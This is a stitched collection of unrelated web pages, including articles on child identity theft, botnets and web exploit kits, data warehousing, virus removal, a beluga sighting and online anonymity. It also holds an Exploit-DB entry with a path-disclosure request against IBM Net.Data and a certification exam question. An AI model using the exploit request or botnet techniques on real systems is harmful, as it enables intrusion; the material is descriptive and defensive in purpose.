and tutorials written by Martin Streicher: - Search the AIX and UNIX library by topic: - AIX and UNIX: The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of AIX systems administration and expanding your UNIX skills. - New to AIX and UNIX?: Visit the "New to AIX and UNIX" page to learn more about AIX and UNIX. - AIX 5L™ Wiki: Discover a collaborative environment for technical information related to AIX. - Safari bookstore: Visit this e-reference library to find specific technical resources. - developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts. - Podcasts: Tune in and catch up with IBM technical experts. Get products and technologies - IBM trial software: Build your next development project with software for download directly from developerWorks. - Participate in the developerWorks blogs and get involved in the developerWorks community. - Participate in the AIX and UNIX forums:
<urn:uuid:d8a854db-a5b6-4205-9d15-0fd608cac9b3>
CC-MAIN-2017-04
http://www.ibm.com/developerworks/aix/library/au-speakingunix10/?ca=dgr-lnxw03aixshellcust
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00432-ip-10-171-10-70.ec2.internal.warc.gz
en
0.864
4,313
2.5625
3
The epidemic of child identity theft revealed last year is continuing to grow. 10.7% of the nearly 27,000 children in the study are victims of identity theft, 35 times higher than adults in the same population, according to AllClear ID. The new data also showed that identity theft is increasing most quickly in young children. In fact, identity theft among children ages 5 and under grew 105% since last year – the highest growth rate of any age group – while 26% of children targeted were between the ages of six and ten, a 34% increase. Young children are optimal targets for criminals, because they have yet to apply for anything to establish a credit history, so their identities are clean slates and thieves can use their information without being detected for many years. Thieves can easily attach a different name to a child’s Social Security number and use it to buy houses and cars, take out credit cards and lines of credit. When the child, as a young adult, attempts to use his or her Social Security number for the first time to get a loan or job, the thief’s bogus information and negative credit history will show up and cause serious problems. Based on extensive scans for nearly 27,000 children, the reported titled Child Identity Theft 2012, is a quantitative analysis of the results. There are no survey results included, as this report reflects the actual theft that children and their families have experienced. The report includes a detailed analysis along with stories of real victims and the serious financial and emotional impact child identity theft has had on their families. Key takeaways from the report include: - Criminals are targeting the youngest children. 15% of victims were five years old and younger, an increase of 105% over the 2011 findings. - 26% of victims were six to ten years old, a growth of 34% from the 2011 report. This stands in sharp contrast to the rates for children over eleven that remained flat or decreased. - 10.7% (2,875) of the minors included in the report had someone else using their Social Security numbers. This is an increase of .5% from the 10.2% rate reported in the 2011 report. - The rate of identity theft for children was 35 times higher than the rate for adults in the same population. - $1.5 million was the largest fraud committed. This was against a 19 year old girl whose Social Security number had been used since she was nine years old. - The overall number of suspects fraudulently using Social Security numbers per child increased by 15% this year over the previous year’s report. One child had six suspects using her Social Security number. “It’s important for parents to understand that child ID theft is a real and growing trend,” said Bo Holland, CEO of AllClear ID. “Rather than letting this trend continue, consumers – parents especially – should take the necessary precautions to ensure the safety of their child’s livelihood. We have the technology, at AllClear ID, to help parents do just that.” There are steps that parents can take to ensure their child’s information is not being used fraudulently, including: - Use free solutions designed specifically to detect child identity theft - Guard their Social Security number - Start scanning your child’s Social Security number when they are young - Go beyond the credit report. Our data showed that 41% of the fraudulent activity was occurring at sources other than the credit bureaus - Talk to your child about online privacy and information security - Use social media with caution.
<urn:uuid:d86fff32-f9a6-4ef6-84a1-459f7936616d>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2012/05/03/child-id-theft-epidemic-continues-to-spread/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00340-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965219
742
2.65625
3
Mary is a new security administrator. She wants to focus most of her efforts on the areas that have the greatest risk. Which of the following areas poses the greatest risk? Employees pose the greatest risk. Even malware is often introduced to a network through lack of diligence on the part of employees. Answer option B is incorrect. While hackers are a real problem, they pose less risk than internal employees. Answer option D is incorrect. Viruses are a legitimate concern. However, they are often introduced due to employees failing to follow security polices. Answer option C is incorrect. It is the case that cyber terrorism is a real threat. However, it is less of a threat than employees.
<urn:uuid:524e8f93-acef-4a7c-8680-b2c73bbba6b8>
CC-MAIN-2017-04
http://www.aiotestking.com/comptia/which-of-the-following-areas-poses-the-greatest-risk/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00488-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947767
142
2.65625
3
The Botnet Ecosystem: Compromised Servers Botnets propagate in all manner of ways. Servers compromised by way of insecure applications or poor security practices provide one way malicious people can push client-compromising exploits. Command and Control Regardless of the fact that P2P technologies are starting to be used for communication between bots, it is still useful to understand how the less evolved bots function. The new P2P-enabled bots have the same functionality at their core, so the concept is the same. A bot herder who controls a bot server (or multiple servers) has at his disposal a number of interesting tools. We briefly talked about what botnets are used for in the introduction to this series, but now let's take a more detailed look at the actual commands a server can send to bot clients. - Start flooding a specific IP or network using TCP, UDP, or ICMP - Add/delete Windows services from the registry - Test the Internet connection speed of the infected computer - Start the following services: http proxy, TCP port redirector, and various socks proxies - Run their own IRC server, becoming a master for other bots to connect to - Capture or "harvest": CD Keys from the Windows registry, AOL traffic including passwords, and the entire Windows registry itself - Scan and infect other computers on the local network - Send spam - Download and execute a file from a given FTP site Moreover, if that was not horrific enough for you, consider the following: all of the IRC bots have modular capabilities. Therefore, if someone programs a new module to extend the bots' capabilities, the owner of the botnet simply runs a single command to install and use the new module on every bot. Web Exploitation Kits These kits allow the attacker to gain control of a client machine when it visits a malicious Web page. The most common avenue of attack is via browser vulnerabilities. The attacking code will instruct the Web browser to download and execute malicious code without the user even knowing. It isn't always a matter of "stupid user that clicked yes," which is why it is so important to install patches as soon as they are released. It is extremely rare for attack code to be part of the initial exploit. Instead, it generally instructs the victim browser to download the exploit from another server. A malicious Web page doesn't generally host the exploit, probably because it'd be reported even more quickly. The server hosting the actual exploit is generally a Web server that was running some piece of PHP (or other) code that allowed someone to secretly upload whatever they wanted. This is caused by mistakes in server configuration, Web application programming errors, or sometimes just plain old security holes in the underlying technologies used. Of course, attackers need to be able to keep track of which IPs they have compromised. MPack and IcePack are the two most popular kits available. They both provide the user with a Web interface and configuration options to set up a "downloader." The downloader is the program that gets run on exploited machines after an attack has succeeded. The downloader will fetch and execute malware from wherever it's configured to do so, and it can use encryption to avoid network-based detection. These Web kits provide attackers with a neat Web page to view statistics about their attack progress. It provides information about how successful the attack is, as well as lists of already-compromised IP addresses. This excellent honeynet.org paper describes the process in more detail, but suffice it to say, this is extremely trivial stuff. Anyone who gets a hold of IcePack, for example, can quickly begin compromising their Web site visitors' computers. No skill, and no knowledge of the actual exploits is required. Compromised Web servers, regardless of color or race, pose a great threat to overall Internet safety. Vulnerable applications exist on every type of Web server, and the underlying OS does nothing to prevent simple exploits from taking place. Simple exploits, like inserting a little text into a site, used to be pretty innocent. Script kiddies, as they were called, would run other peoples' exploits and deface sites with obscene text or their groups' markings. Every once in a while they would try running some code to open a backdoor into a Unix server, which allowed them access as the user the Web server ran as. But now, with botnets and automated attacks, a simple exploit like this is pretty serious. Web servers play a huge role in the initial infection, re-infection, and maintenance of botnets. Very often the "downloader" provided by the Web exploitation kits will be used to install bot client software. This is likely an extremely effective method of expanding a botnet, since network-based attacks can be blocked and are more likely to be patched. Fixing all Web server holes won't stop users from getting infected by any means, but understanding the role of exploited Web servers in the malware ecosystem helps us learn how to fight it.
<urn:uuid:163e543c-4495-4dec-9cf3-c853b8906168>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/netsecur/article.php/3718171/The-Botnet-Ecosystem--Compromised-Servers.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00396-ip-10-171-10-70.ec2.internal.warc.gz
en
0.936581
1,025
2.703125
3
Sirami C.,CNRS Center of Evolutionary and Functional Ecology | Sirami C.,South African National Biodiversity Institute | Sirami C.,University of Cape Town | Nespoulous A.,CNRS Center of Evolutionary and Functional Ecology | And 9 more authors. Landscape and Urban Planning | Year: 2010 Mediterranean landscapes resulted from the complex and ancient interaction of ecosystems and societies. Today they represent one of the world's biodiversity hotspots. These landscapes have a fine-grained mosaic and a high resilience to disturbances. However, during the last century, human pressures have led to new landscape structures and dynamics and an overall decrease in biological diversity. Within a Mediterranean landscape from southern France, we assessed the effects of land use changes on land cover and biodiversity over the last 60 years. The major land use changes involved a substantial decrease in sheep grazing and wood cutting corresponding to the abandonment of 70% of the study area. This resulted in a reduction in land use diversity which was usually high in the Mediterranean. Although land cover in the study area changed gradually (2.2% per year), over 74% changed between 1946 and 2002. This habitat shift had a subsequent impact on species distribution. Apart from amphibians and insects, most species of birds, reptiles, orchids and rare plants that responded positively to these changes were associated with woodlands, while species that responded negatively were associated with open habitats. In the Mediterranean, most rare and endemic species are associated with open habitats and are thus threatened by land abandonment. As a result, land abandonment is contributing to a decrease in local species richness and a decrease in rare and endemic species. Since similar patterns of change have been observed over most of the north-western Mediterranean, land abandonment represents a major threat for biodiversity in the Mediterranean. © 2010. Source Bolte S.,Center de | Bolte S.,University Pierre and Marie Curie | Lanquar V.,French National Center for Scientific Research | Lanquar V.,Carnegie Institution for Science | And 6 more authors. Plant and Cell Physiology | Year: 2011 Plant cell vacuoles are diverse and dynamic structures. In particular, during seed germination, the protein storage vacuoles are rapidly replaced by a central lytic vacuole enabling rapid elongation of embryo cells. In this study, we investigate the dynamic remodeling of vacuolar compartments during Arabidopsis seed germination using immunocytochemistry with antibodies against tonoplast intrinsic protein (TIP) isoforms as well as proteins involved in nutrient mobilization and vacuolar acidification. Our results confirm the existence of a lytic compartment embedded in the protein storage vacuole of dry seeds, decorated by γ-TIP, the vacuolar proton pumping pyrophosphatase (V-PPase) and the metal transporter NRAMP4. They further indicate that this compartment disappears after stratification. It is then replaced by a newly formed lytic compartment, labeled by γ-TIP and V-PPase but not AtNRAMP4, which occupies a larger volume as germination progresses. Altogether, our results indicate the successive occurrence of two different lytic compartments in the protein storage vacuoles of germinating Arabidopsis cells. We propose that the first one corresponds to globoids specialized in mineral storage and the second one is at the origin of the central lytic vacuole in these cells. © 2011 The Author. Source Deconinck N.,Free University of Colombia | Deconinck N.,University Pierre and Marie Curie | Dion E.,University Paris Diderot | Yaou R.B.,University Pierre and Marie Curie | And 24 more authors. Neuromuscular Disorders | Year: 2010 Bethlem myopathy and Ullrich congenital muscular dystrophy are part of the heterogeneous group of collagen VI-related muscle disorders. They are caused by mutations in collagen VI (ColVI) genes (COL6A1, COL6A2, and COL6A3) while LMNA mutations cause autosomal dominant Emery-Dreifuss muscular dystrophy. A muscular dystrophy pattern and contractures are found in all three conditions, making differential diagnosis difficult especially in young patients when cardiomyopathy is absent.We retrospectively assessed upper and lower limb muscle CT scans in 14 Bethlem/Ullrich patients and 13 Emery-Dreifuss patients with identified mutations.CT was able to differentiate Emery-Dreifuss muscular dystrophy from ColVI-related myopathies in selected thigh muscles and to a lesser extent calves muscles: rectus femoris fatty infiltration was selectively present in Bethlem/Ullrich patients while posterior thigh muscles infiltration was more prominently found in Emery-Dreifuss patients. A more severe fatty infiltration particularly in the leg posterior compartment was found in the Emery-Dreifuss group. © 2010 Elsevier B.V. Source
<urn:uuid:1f1288e6-aba7-42ad-933b-5b84dfc0e6bc>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/center-de-484248/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00514-ip-10-171-10-70.ec2.internal.warc.gz
en
0.902792
1,037
3.03125
3
source: http://www.securityfocus.com/bid/2017/info IBM Net.Data is a scripting language used to create web applications, it supports a wide range of language environments and is compatible with most recognized databases. Net.Data contains a vulnerability which reveals server information. Requesting a specially crafted URL, by way of the CGI application, comprised of an invalid request and known database, will reveal the physical path of server files. Successful exploitation of this vulnerability could assist in further attacks against the victim host. http://target/cgi-bin/db2www/library/document.d2w/show DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w. Related ExploitsTrying to match CVEs (1): CVE-2000-1110 Trying to match OSVDBs (1): 9483 Other Possible E-DB Search Terms: IBM Net.Data 7.0, IBM Net.Data |2004-01-26||IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting||Carsten Eiram|
<urn:uuid:3028438c-5ef2-4439-a109-29ec0d537bf4>
CC-MAIN-2017-04
https://www.exploit-db.com/exploits/20441/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.792435
257
2.640625
3
Accelerating the Data WarehouseBy David F. Carr | Posted 2002-11-01 Email Print Need quicker access to your data? Try Massively Parallel Processing (MPP), which breaks up a query so that multiple processors can run it against multiple storage devices. - How is it done? In a number of ways. One of the more promising strategies, Massively Parallel Processing (MPP), involves breaking up a query so that multiple processors can run it against multiple storage devices, then reassemble the responses to produce an answer. Another alternative is SMP (Symmetric Multiprocessing), in which multiple processors juggle tasks using caching techniques and a common pool of memory. - What's the benefit? Quicker access to information in a world of huge databases. With MPP, adding processors improves access time at a nearly linear rate: A 32-processor machine can query more than 3 terabytes of data in about the same time that a single processor could query 100 gigabytes. While the scalability and performance of SMP systems keeps improving, MPP architectures still dominate very large data warehousing applications. - Who invented it? In the data warehousing market, NCR's Teradata unit has been MPP's biggest proponent. The largest Teradata warehouses run on the company's own WorldMark server hardware and its own version of Unix, using a database management system designed specifically for the MPP environment. Because supporting MPP requires tweaks to the database management system, operating system and server hardware, many vendors have preferred to push the limits of what they can achieve with SMP. However, IBM is supporting MPP with its Regatta servers (RS/6000 SP) and in its DB2 Extended Enterprise Edition. In September, startup Netezza introduced its Netezza Performance Server, a refrigerator-sized "data warehouse appliance" aimed at providing MPP performance at a lower price by using open-source software like Linux and the Postgres database. Netezza uses specialized query-processing chips installed on each hard disk. Each of these "snippet processors" scans the disk it is responsible for, finds data matching the query parameters, and sends the results back to the database responsible for assembling the answer. This cuts down on the transmission of irrelevant data within the server cabinet, minimizing performance bottlenecks and lessening the workload on the central database. - Who's using it? Teradata has a blue-chip customer base, including Wal-Mart in retailing and Whirlpool in manufacturing. Lloyd's of London is using IBM's MPP solution to analyze claims and other insurance data. Netezza has captured a handful of early customers. Vibrant Solutions, which works with companies such as Nextel on call-data analysis, says it will be able to support much more data, with faster query response, by employing Netezza's technology. "It's very similar to a lot of the other massively parallel architectures that have been around for a while, but they brought the price into a reasonable window," says Vibrant CTO Rick Mahuson. - What are the drawbacks? MPP systems tend to cost more, both in price and ongoing administration. Teradata says the long-term cost of ownership is favorable, however, particularly when scattered data marts (departmental data warehouses) are consolidated into a central, company-wide data warehouse. Netezza is trying to change the price equation (at $2.5 million, even its 18-terabyte server is a fraction of the cost of comparable MPP systems) and claims its appliance will run with minimal administration. "Netezza's product shows great promise," says Giga Information Group analyst Philip Russom, but he suspects many enterprise customers will be scared of entrusting multi-terabyte applications to open-source technology. REFERENCE: ONE QUERY, MANY PATHS Even with today's superfast machines, it can take days to generate a report from a multi-terabyte warehouse. Here's how using Massively Parallel Processing can speed up the task. - 1. A 3-terabyte data warehouse receives a request for a list of all customer purchases that were greater than $10,000. - 2. It passes on the query to 10 "nodes." Each node has its own processors and also controls one or more storage devices. Each storage device, in turn, contains a subset of the 3-terabyte warehouse. In this example, each node queries one storage device that holds 100,000 records. - 3. Each device sends back a list. The data warehouse consolidates the responses into a single result that took hours instead of days to build. Wondering if you might need to reexamine your processing capability? Click here to take our quick Quiz. Not convinced you need to process in parallel? Click here to download a PDF (Portable Document Format) version of Sun Microsystems' white paper on the advantages of a symmetric architecture.
<urn:uuid:afabe060-aab6-4c14-abe4-efd03619bb68>
CC-MAIN-2017-04
http://www.baselinemag.com/c/a/Projects-Networks-and-Storage/Accelerating-the-Data-Warehouse
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00570-ip-10-171-10-70.ec2.internal.warc.gz
en
0.909241
1,031
2.578125
3
One of the most common posts that you see in various forums is from people who suspect that their computer might be virus infected. Posts such as, “My computer is crashing, do I have a virus?” or “I just got infected with a virus, what should I do?” are a clear indication that virus infection is a serious problem and that having guidelines on how to tackle such an event is essential. Determining whether you’re infected The first step to take when suspecting your computer might be infected is to actually confirm whether it is or not. There a lot of viruses out there and whilst most anti-virus solutions can detect almost all of them, there is always the risk of being infected with a custom virus – something as yet unknown or even something that your anti-virus solution might not be able to recognize yet. As such if your anti-virus solution is saying that you’re clean, it’s a good sign, but not necessarily a definite one. What should one do to be sure? The first step is to take note of when the symptoms that are making you suspect a virus started. Then think about anything that you might have run/installed during that time. (Note: not all infections start with the user running something but it is the majority of cases. This should also include attachments you opened or ran from your received emails.) If anything from the above exercise raises a red flag in your mind, or might be of dubious origin (such as receiving an email from a friend that didn’t sound like them), then it is definitely worth investigating that file. We already know that the virus scanner installed didn’t detect any viruses but we need to be sure – so how about testing the file with multiple anti-virus engines? Using multiple anti-virus engines Don’t worry, you do not need to buy them all; there is a free service that does exactly this. All you need to do is upload the suspicious file and see if it is detected as a malicious file by any of the virus engines. If, on the other hand, you have no idea which file might have caused the infection, the only other option is to scan your computer with another anti-virus. Again we do not have to buy any products for now, most anti-virus offer free anti-virus scanning from the web. These will only detect a virus however, they will not clean it. Still, for our purpose, which is finding whether we’re infected and with what, it’s enough. You can search for online virus scanners or use one from the list below: Once you’ve finished scanning and you do find a virus, you have three options: - Buy the full product of the brand that detected your virus. (This will ensure that at least you will definitely know that it will be detected) - Search the web for a free tool that can clean this particular virus or even documentation of how to do it manually. (This is only recommended if you’re an advanced user. Be aware that most of these procedures can be quite advanced and that either not following them correctly or discovering that they have an error in their procedure can make matters worse by breaking your Windows installation) - Alternatively if you have backups you can also reinstall your Windows installation. This is a bit inconvenient but it is also the only way to be 100% sure that you got rid of the virus. (Make sure your backups are not infected!) What if I am unable to find any virus? If, after scanning with multiple anti-virus engines, you still don’t detect anything, it is likely that the symptoms you’re experiencing are coming from something else – possibly a hardware problem. Of course there is still that small chance that either this virus is still too new or that it is custom built and maybe this was a targeted attack. However, it could be that anti-virus use heuristics to detect infestation; i.e. they try to look for suspicious routines in software that might indicate that the file contains a virus even though that type of virus was never analyzed before by the anti-virus vendor. Let’s assume that there is actually no virus. In this case we must look at what the symptoms are and what’s causing them. What people most often mistake for viruses occurs when the computer freezes. This can happen for a number of reasons. The most common being faulty ram. We can test for this using the free program, memtest86+. Video card issues If your screen gets garbled before it freezes, it’s likely to be either a video card problem or a power supply unit problem that is not supplying enough power to the video card. It could also be that the graphic card is over-heating. Playing modern 3D games is the best way to stress the video card so if this happens when you’re playing, and occurs in multiple games, then this is definitely something worth looking into. Some graphic cards include utilities to monitor the temperature and current of the card which are definitely worth keeping an eye on to help diagnose the issue. Hard Disk Failure If both the above seem okay, then a third possibility is a hard disk failure. Your computer uses a set amount of hard disk space for swapping (to use as memory when this fills out); if the data is corrupted it can cause the computer to freeze when it is accessed again. To diagnose this just run a scandisk: – right click on the drive you want to check in windows explorer – click properties – switch to the tools tab – click check now under error-checking – make sure the check box ‘scan for and attempt recovery of bad sectors’ is enabled. If indeed there are bad sectors, then make sure the swap partition is on another drive that has none. It is also very much recommended that you have a backup of the data on that drive and that you replace it as soon as possible as it might get worse and eventually stop working. To change the location of the swap file you need to: – right click on my computer – choose properties – go to advanced settings – click on the advanced tab – choose settings under the performance group box – go to the advanced tab – click on change under the virtual memory group box. What to consider if your machine is infected There are a number of things to do if you find that your machine is infected. If your computer is hooked to a network, isolate it as soon as possible to prevent the infection from spreading. This is done either by disconnecting the infected machine from the network or if you need the internet to fix the issue then disconnect the other machines if it is feasible. (Note that when connected to the internet the infected machine might try to infect other machines, send spam or even launch attacks against certain sites – some infections (Trojan horses) can effectively give control of your computer to a malicious third party so in any case the less time online the better). Some infections are really insidious and acutally modify the operating system to hide from the anti-virus software. These types of infections called root kits can be impossible to detect from the infected system itself. In this case we’d need to boot from a clean Windows installation and use that to run our scans. Luckily there are products out there that offer bootable CDs to use in these cases. Advanced users can even build their own. Prevention is better than Cure Here are a few tips on how not to get infected and even how to protect from getting infected again. - It is essential to keep your system up-to-date. Software has bugs and bugs can sometimes be exploited by viruses to infect people’s machines without their intervention. So ensure that your system is up-to-date with the latest security patches. Microsoft for example generally release their security patches on each second Tuesday of the month. - Have an anti-virus solution in place to protect your machine. Businesses can go a step further and install products that protect specific vectors such as web downloads and email using products that scan for multiple viruses using multiple anti-virus engines. Having a firewall set up can also reduce the risk of infection. - Be careful of what you install and run on your machine. Each time you run an application there is a risk of infection; the more unreliable the source the bigger the risk. No source is ever 100% safe as sometimes viruses have been distributed with hardware and even with magazines such as reported in a recent story about the virus that targets the Delphi development environment: W32/InducA. This is not to say that one shouldn’t run any software but it’s good practice to be aware and protected. We have discussed at length how to confirm whether your machine has an infection or not, as well as what it could be if there are signs that point to an infection but no virus is found. We have also gone through some good tips on how one can protect their system from infection; however, this is a huge area and individual cases will be different, but if you have any difficulties or situations that haven’t been discussed here, feel free to leave a comment and I will try to help out if I can.
<urn:uuid:44bb6d45-1011-457f-897f-6158a9fc4ddf>
CC-MAIN-2017-04
https://techtalk.gfi.com/pc-virus/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00386-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954219
1,937
2.609375
3
TADOUSSAC, QUEBEC--(Marketwire - Oct. 10, 2012) - A three- or four-metre long white or greyish beluga whale has been seen several times near the Old Port since September 28. No photos have been taken yet, but the Québec Marine Mammals Emergency Network feels that these observations are reliable. Where did this beluga come from? The closest population of belugas lives in the St. Lawrence Estuary. It is a small population, isolated from other northern populations, and is considered threatened. The beluga in Montréal could be a young animal from this group that has gone exploring, which is normal behaviour. Why is it being monitored? Belugas are social animals. If this beluga were at home, it would be in constant contact with other belugas. Now that it is on its own, it may try to interact with boats and humans. In the summer of 2012, for example, we saw two young belugas travelling around the Gaspé Peninsula, interacting with boats and swimmers in every small town. Luckily, they returned to their natural habitat and those abnormal behaviours ceased. Other isolated belugas, spotted off the Lower North Shore and around Nova Scotia or Newfoundland, have been less lucky; they were eventually wounded or killed by a boat. Will it go back to where it came from? The best thing that could happen to this beluga is for it to swim back down the Saint Lawrence, find a group of belugas and return to its normal habitat. There is a good chance that this will occur. To help ensure its return, we must avoid it becoming used to humans and, therefore, we should not interact with it. How can you help? If you see the beluga, immediately call the Marine Mammals Emergency Network at 1-877-722-5346. It is important to stay at least 400 m away, not to approach it, not to lure it close to humans, not to make noise or stimulate or attract its attention, and not to try to feed it. It is also advisable to avoid boating in the area it has been seen. By limiting its interaction with humans, we can maximize the chance that it will return to its natural habitat in good health. The Quebec Marine Mammal Emergency Response Network is made up of a dozen private and governmental organizations. It has been mandated to organize, coordinate and implement measures to reduce the accidental death of marine mammals, help animals in trouble and gather information in cases of beached or drifting carcasses in waters bordering the province of Quebec.
<urn:uuid:10415c6d-871f-48bb-9fc3-928c6a0cbbd8>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/beluga-sighting-in-montreal-1712010.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962484
540
3.1875
3
Dr Louise Bennett explains the difference between security, secrecy, privacy and anonymity online. At a roundtable hosted by Silent Circle, Dr Louise Bennett, chair of the Security Community of Expertise, talked about the issues in differentiating security, secrecy, privacy and anonymity online. "The real balancing act between security and privacy is between notifications and the right to privacy," says Dr Bennett. "This is what people get upset about in companies like Google with the commercialisation of the internet and government surveillance. It’s because these things have been linked together without the permission of the individual or they cross things that I don’t give my consent to share with anybody else. "We all know that there are a lot of different commercial models on the internet. Some services are free or below cost because of the value of data that you as a customer give up when you use the site. And the quid-pro-quo is usually targeted advertising. Young kids I talk to say, ‘Facebook is free, and that’s wonderful.’ But Facebook is not free, get real! You’re putting all this personal data out there and often they don’t know the privacy settings so this can be seen by anybody and this is then used to target you. "The key thing is how do you keep control of your data and personal information? Well statistics will tell you, you can’t on the internet. Once it’s out there, it’s out there. If someone is determined to find your data, you’ve got a problem. She stresses: "We have to understand that identity on the internet can be used as currency and can be gathered through Big Data aggregation and Big Data analytics and you have to decide to what extent you are prepared to use your identity attributes as payments for services you want. But you have to be aware of it and make your own choice." She also highlights the second balancing act, which puts security and secrecy on one side and privacy and anonymity on the other. "I think there are really significant differences between privacy and anonymity. I would say that on the internet, anonymity is the ability to perform actions without them being traced to a person; they can trace them to the thing, but not the person." Dr Bennett draws out the pros and cons of anonymity by stating that it can ensure individuals have the right to free speech without fearing the repercussions. But also, people can’t be easily identified and held to account if they are anonymous. Alternatively, she describes secrecy as what is known but not to everybody. Secrecy is what the intelligence services strive for. On the other hand, privacy is the ability to provide information to those who only we want provides the information to under our own free will. "Privacy protects people and doesn’t per say damage national security or law enforcement. But some would say it does. It does make those things harder to achieve. But I would say anonymity does cause damage," she says. "Some of the only people who have really chosen to be anonymous are the people in Anonymous and LulzSec. They know the persona and the avatar, but they didn’t know the biological person before they got together. Anonymity isn’t necessarily for privacy but it is often misinterpreted as being synonymous with privacy. Activists in the Arab Spring say they wanted anonymity, but they didn’t because if they had anonymity they wouldn’t have been known to their friends and could have been compromised by the state. What they wanted was privacy from the state. That is not the same thing. "I think privacy overlaps security; they go hand-in-hand and what advocates for privacy really want is security for the individual from the intrusion into their personal life or targeted action. You have two groups of people: advocates of strong unique electronic identities for national security purposes will often come from countries like China and countries with oppressive regimes," explains Dr Bennett. On the side of those who are anti-anonymity, there are arguments that with the shield of anonymity, individuals can stalk, masquerade as others, they can be liable and will get into organisations to steal and defraud. Anonymous terrorists can plan, radicalise and perform cyber attacks and activists can compromise businesses and publish confidential information. Anonymity essentially removes accountability and makes the job of law enforcement much harder in the virtual world than it is in the physical world. For those who are pro-anonymity and oppose electronic identities argue that there are those who use anonymity with good intent: whistleblowers who unveil wrongdoings of powerful individuals or organisations. Individuals can partition their lives or limit damage caused by people stealing their identities. They’ll say that individuals with anonymity can avoid discrimination, escape abusive relationships and regimes and start a new life. Activists with a vested interest can give a voice to the silent majority. Anonymity protects the weak individual from abuse by the powerful. "Most people are probably on both sides of the argument: it isn’t as simple as that," says Dr Bennett. "There is an enormous amount of work being done across the world, security, privacy and anonymity: how they work against each other and how they overlap. There is never going to global agreement over the rationality of these different things, what we have to work towards is global understanding of people’s perspectives and an understanding of the context." She concludes: "There are those who are against anonymity because it prevents accountability of those with malicious intent and there are those who are for anonymity because there are those with good intent who are abused by others. There isn’t a single answer, you have to choose but you have to be aware of others opinions."
<urn:uuid:fec7c9a7-edfe-4a47-b61d-fe7d117e0a82>
CC-MAIN-2017-04
http://www.cbronline.com/news/do-you-want-to-be-private-or-anonymous-on-the-net
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00414-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967848
1,182
2.84375
3
By Hariharan B, Research Analyst Lead acid batteries are the preferred choice for powering automobiles due to certain advantages they carry and also because they are economically viable. Batteries that currently power automobiles are 12-volt (V) starting, lighting and ignition (SLI) batteries that are either of flooded construction or of the valve regulated construction. Today's lead acid batteries used for powering the automobiles have a limited power range and with the demand for power increasing among the automobiles, automotive vendors and battery manufacturers have been on the lookout for an efficient power device that provides the perfect solution in addition to being cost effective! With the advent of hybrid electric vehicles and battery powered vehicles, the demand for batteries has been on the upswing. Also, the fact that batteries are environmentally friendlier in comparison to the existing petroleum products that are used to power the automobiles make them much more valuable as a product for use in transportation. The SLI batteries used today are typically the 2V cells connected in series to provide 12V as a whole. The SLI battery comes into force when the automobile is being started and this current given out by the battery is called the cranking current which could vary from anywhere between 200 – 300 Amps up to 800 – 1000 Amps within a fraction of a few milliseconds. The batteries also come into play for powering certain other electrical and electronic equipments within the automobile. The automotive segment is the biggest market for lead acid batteries while the stationary and motive applications come a close second in terms of demand for lead acid batteries. The automotive segment offers enormous opportunities as the market is widespread across geographical regions and with the demand coming in from each and every automobile thats manufactured, the growth is likley to be positive with a demand that is likely to be sustained for years to come. The current battery demand in the automobile segment is being met by lead acid batteries mainly from the SLI segment, while the deep cycle batteries cater to certain specific requirements especially among the electric and hybrid vehicle category. The electrical power needs of a battery / hybrid powered vehicle are much more in comparison to the power needs of typical petroleum fuel powered vehicles. Future Power Needs Hybrid electric vehicles (HEV’s) combine the internal combustion (IC) engine of conventional vehicles with the energy storage device and electric motor of electric vehicles. The part of energy storage is normally the batteries, ultracapacitors and flywheels, while batteries are by far the most preferred energy storage choice. Alternatively, in a pure battery powered vehicle, the entire power is being generated by the batteries and this in effect needs larger amount of power as the output from the battery. On the other hand, gas powered vehicles are increasing their power needs due to increased dependence on electronics and automation. The 42V electrical system demands a 36V battery that can power the demands of the automobile. The challenge is to have a single 36 V battery with a slight increase in size and weight in comparison to the 12V battery and double or triple the electrical performance. Desirable characteristics in a battery for HEV applications are high peak and pulse specific power, high specific energy at pulse power, a high charge acceptance to maximize regenerative braking utilization with a long cycle life and the fact that they are abuse resistant. All these requirements call for certain improvements in the existing lead acid batteries as they are not designed for pulse power, have low specific energy and short cycle life. The aforementioned attributes of a battery required by HEV’s are being met by certain other chemistries like nickel metal hydride (Ni-Mh), lithium ion (Li-ion) and lithium ion polymer which meet some of the attributes successfully. Though the above three chemistries are suitable to an extent, aspects like recycling, performance at high temperatures and economic viability limit the acceptance and commercial production of the same. One of the key reasons for the slow pace in implementation of either the 42V batteries or the acceptance and wide commercial production of complete battery powered / hybrid electric vehicles is the fact that they are prohibitively expensive due to the high cost of the batteries involved, the technology gap to meet the desired expectations and the aspect of compatibility to be met to make a successful transition from gas powered 12V automobiles. Bipolar Lead 